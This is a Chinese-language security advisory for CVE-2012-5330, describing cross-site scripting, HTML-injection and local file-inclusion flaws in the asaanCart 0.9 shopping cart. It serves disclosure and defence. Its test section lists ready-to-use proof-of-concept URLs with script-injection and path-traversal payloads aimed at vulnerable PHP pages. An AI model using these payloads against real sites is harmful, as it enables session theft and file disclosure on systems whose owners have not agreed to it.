asaanCart跨站脚本执行漏洞

发布日期：2012-03-14
更新日期：2012-10-10受影响系统：
sourceforge asaanCart 0.9
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 52498
CVE ID: CVE-2012-5330asaanCart是专为小型业务开发的在线购物车解决方案。asaanCart 0.9存在多个XSS漏洞，可允许远程攻击者通过PATH_INFO向calc.php、chat.php、 register.php、index.php传参，或page参数向libs/smarty_ajax/index.php传参注入意任意Web脚本或HTML代码。<*来源：Number 7
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！for the HTML-injection vulnerabilities:
http://www.example.com/asaancart%20v-0.9/libs/smarty_ajax/calc.php/%22onmouseover=prompt（944322）%3E%3Cu%3E%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cbig%3EInjection%20Here%3C/big%3E%3C/big%3E%3C/big%3E%3C/big%3E%3C/u%3E
http://www.example.com/asaancart%20v-0.9/libs/smarty_ajax/chat.php/%22onmouseover=prompt（998415）%3E%3CBig%3E%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cu%3EHtml%20Injection%20HerE.%3C/u%3E%3C/Big%3E%3C/big%3E%3C/big%3E%3C/big%3E
http://www.example.com/asaancart%20v-0.9/libs/smarty_ajax/register.php/%22onmouseover=prompt（970389）%3E%3Cbig%20style=%22color:%20rgb（204,%200,%200）;%22%3E%3Cbig%3E%3Cspanstyle=%22font-weight:%20bold;%20font-style:%20italic;%20text-decoration:%20underline;%22%3EHtmlInjection.%3C/span%3E%3C/big%3E%3C/big%3E
http://www.example.com/asaancart%20v-0.9/libs/smarty_ajax/index.php/%22onmouseover=prompt（970389）%3E%3Cbig%20style=%22color:%20rgb（204,%200,%200）;%22%3E%3Cbig%3E%3Cspanstyle=%22font-weight:%20bold;%20font-style:%20italic;%20text-decoration:%20underline;%22%3EHtmlInjection.%3C/span%3E%3C/big%3E%3C/big%3Efor the cross-site scripting vulnerability:
http://www.example.com/asaancart%20v-0.9/libs/smarty_ajax/index.php？_=&f=update_intro&page=1%3CScRiPt%20%3Eprompt%28949136%29%3C%2fScRiPt%3Efor the local file-include vulnerability:
http://www.example.com/asaancart%20v-0.9/libs/smarty_ajax/index.php？_=&f=update_intro&page=../../../../../templatesadd_product建议：
--------------------------------------------------------------------------------
厂商补丁：sourceforge
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://jocr.sourceforge.net/index.htmlasaanCart多个输入验证漏洞TYPSoft FTP Server APPE命令拒绝服务漏洞相关资讯跨站脚本执行漏洞 asaanCart asaanCart漏洞

HP Network Node Manager i多个不（02/05/2013 09:14:03）
JBoss Enterprise Portal Platform （01/26/2013 08:05:16）
Advantech WebAccess HMI/SCADA不（01/11/2013 08:47:20）

Google Web Toolkit 跨站脚本执行（01/26/2013 08:08:23）
Apache CouchDB 跨站脚本执行漏洞（01/19/2013 09:24:15）
Feng Office跨站脚本执行和越权操（11/25/2012 07:25:26）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容
本站有权在网站内转载或引用您的评论